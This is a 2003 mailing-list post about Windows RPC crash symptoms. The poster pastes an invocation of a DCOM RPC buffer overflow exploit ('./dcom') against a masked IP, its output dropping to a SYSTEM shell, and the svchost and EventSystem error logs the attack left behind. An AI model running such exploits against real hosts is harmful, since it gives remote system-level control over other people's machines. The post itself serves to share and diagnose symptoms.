[THIN] Re: OT: RPC symptoms

  • To: <thin@xxxxxxxxxxxxx>
  • Date: Tue, 12 Aug 2003 13:19:39 -0400

Amazing...

This is all it takes. And I'm patched to date.

Wonder when they'll fix that!

[root@orbital root]# ./dcom 4 xxx.xxx.xxx.xxx (IP munged for security
purposes)

- Remote DCOM RPC Buffer Overflow Exploit
- Using return address of 0x77f92a9b
- Dropping to System Shell...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

Date:                DATE
Time:                TIME
User:                N/A
Computer:         COMPUTERNAME
The application, svchost.exe, generated an application error The error
occurred on DATE @ TIME. The exception generated was c000001d at address
77E8367A (<nosymbols>)

Also this:

Event Type:       Error
Event Source:    EventSystem
Event Category: Event System
Event ID:           4097
Date:                DATE
Time:                TIME
User:                N/A
Computer:         COMPUTERNAME
The COM+ Event System detected a bad return code during its internal
processing.  HRESULT was 800706BF from line 42 of .\eventsystemobj.cpp.
Please contact Microsoft Product Support Services to report this error.

This Week's Sponsor:  RES PowerFuse, The Management Framework for
Windows
Eliminate Multiple Tools, Multiple Support Channels and Multiple Costs
Manage, Control, and Secure an Entire Windows environment with Ease,
including Real-time Reporting and Documenting Components
Validate a Meaningful ROI on All of your IT Investments with RES
PowerFuse.
http://www.respowerfuse.com/